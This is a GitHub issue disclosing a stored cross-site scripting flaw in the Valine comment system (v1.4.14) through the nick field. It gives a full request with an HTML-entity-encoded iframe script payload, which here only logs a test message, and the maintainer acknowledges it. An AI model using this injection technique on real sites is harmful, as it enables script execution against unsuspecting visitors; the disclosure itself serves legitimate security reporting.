Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[vulnerability] Stored XSS via Nick field #348

Closed
4 tasks
SofFM opened this issue Nov 11, 2020 · 3 comments
Closed
4 tasks

[vulnerability] Stored XSS via Nick field #348

SofFM opened this issue Nov 11, 2020 · 3 comments
Labels

Comments

@SofFM
Copy link

SofFM commented Nov 11, 2020

如果您想报告错误,请提供以下信息 If you want to report a bug, please provide the following information:

  • Description

    It is possible to embed an arbitrary HTML/JavaScript in the comment (using nick field), thus resulting in stored XSS (cross site scripting).

  • 可复现问题的步骤 The steps to reproduce.

    1. Change the request body for adding comment as follows:
POST /1.1/classes/Comment HTTP/1.1
Host: XXX.api.lncld.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Content-Length: 640
Origin: https://xxx.yyy.zzz
{
    "comment": "Good! \n",
    "nick": "Alex\"</a><iframe width=1 height=1 srcdoc=\"&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#99;&#111;&#110;&#115;&#111;&#108;&#101;&#46;&#108;&#111;&#103;&#40;&#39;&#83;&#116;&#111;&#114;&#101;&#100;&#32;&#88;&#83;&#83;&#32;&#116;&#101;&#115;&#116;&#32;&#112;&#97;&#115;&#115;&#101;&#100;&#39;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;\"",
    "mail": "",
    "link": "",
    "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Fire-fox/82.0",
    "url": "/en/prepare/prepare/",
    "QQAvatar": "",
    "ip": "1.2.3.4",
    "insertedAt": {
        "__type": "Date",
        "iso": "2020-11-04T08:30:47.526Z"
    },
    "ACL": {
        "*": {
            "read": true
        }
    }
}
  1. This malicious request adds new comment. The HTML-encoded value of srcdoc attribute in request is:
    <script>console.log('Stored XSS test passed');</script>

  2. The injected JavaScript executes on the vulnerable web-page for every visitor.

image

  • 受影响的Valine版本、操作系统,以及浏览器信息 Which versions of Valine, and which browser / OS are affected by this issue?

    Valine: v1.4.14
    All systems and browsers

@xCss xCss added the bug label Nov 11, 2020
@xCss
Copy link
Owner

xCss commented Nov 11, 2020

收到,将在下个版本修复,感谢反馈~

@SofFM
Copy link
Author

SofFM commented Dec 23, 2020

@xCss , Hi! I would like to point out that the official valine web-site https://valine.js.org is also vulnerable to this stored XSS attack

@xCss
Copy link
Owner

xCss commented Oct 19, 2021

@xCss xCss closed this as completed Oct 19, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants